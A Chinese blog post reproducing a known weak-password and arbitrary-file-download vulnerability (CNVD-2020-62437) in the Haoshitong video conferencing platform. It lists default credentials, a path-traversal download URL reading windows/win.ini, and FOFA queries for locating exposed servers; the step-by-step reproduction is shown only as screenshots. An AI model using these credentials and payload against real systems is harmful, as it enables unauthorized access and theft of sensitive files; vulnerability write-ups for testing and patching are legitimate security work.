好视通视频会议平台系统漏洞复现

「爱情、让人受尽委屈。」 2022-10-14 05:41 327阅读 0赞

### 文章目录 ###

*   *   *  漏洞名称
         *  漏洞编号
         *  漏洞描述
         *  影响版本
         *  漏洞点
         *  fofa
         *  
         *  漏洞复现一
         *   *  第一步 查看登录界面
             *  第二步 使用弱口令
             *  第三步 进入系统
             *  第四步 任意文件读取
         *  摘抄

### 漏洞名称 ###

*  弱口令
 *  任意文件下载

### 漏洞编号 ###

*  CNVD-2020-62437
 *  https://www.cnvd.org.cn/flaw/show/CNVD-2020-62437

### 漏洞描述 ###

*  好视通云会议是一款高效、便捷、低成本的网络视频会议产品，通过电脑或手机登录好视通云平台，
 *  便可快速地与全球各地团队进行实时音视频沟通，并可同步分享各类数据文档。
 *  好视通视频会议平台存在弱口令及前台任意文件下载漏洞
 *  可获取任意敏感文件信息。

### 影响版本 ###

### 漏洞点 ###

*  弱口令 sysadmin/password$123 或者 admin/ admin
 *  任意文件下载 /register/toDownload.do?fileName=敏感文件路径

https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

### fofa ###

app="好视通-视频会议"
    "深圳银澎云计算有限公司"
    app="Hanming-Video-Conferencing"

###  ###

### 漏洞复现一 ###

#### 第一步 查看登录界面 ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]

#### 第二步 使用弱口令 ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]

#### 第三步 进入系统 ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]

#### 第四步 任意文件读取 ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]

### 摘抄 ###

--------------------

只有跳下去，才知道风口上的猪，会不会飞起来。  
摘自–一点就到家

--------------------

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221014/4667d87c27a14b2f905fedc2718a0469.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20221014/ff641f8821714334b66f6df8951fb93f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20221014/bf99cb604b1d4af7b9e4f0eac0bed206.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20221014/d4448a69332645de91e538cec986f262.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]: /images/20221014/269eaa1fa39449658069dfb53c9aafe2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]: /images/20221014/626fa7546d0945dc916bcf8dd0eb19f5.png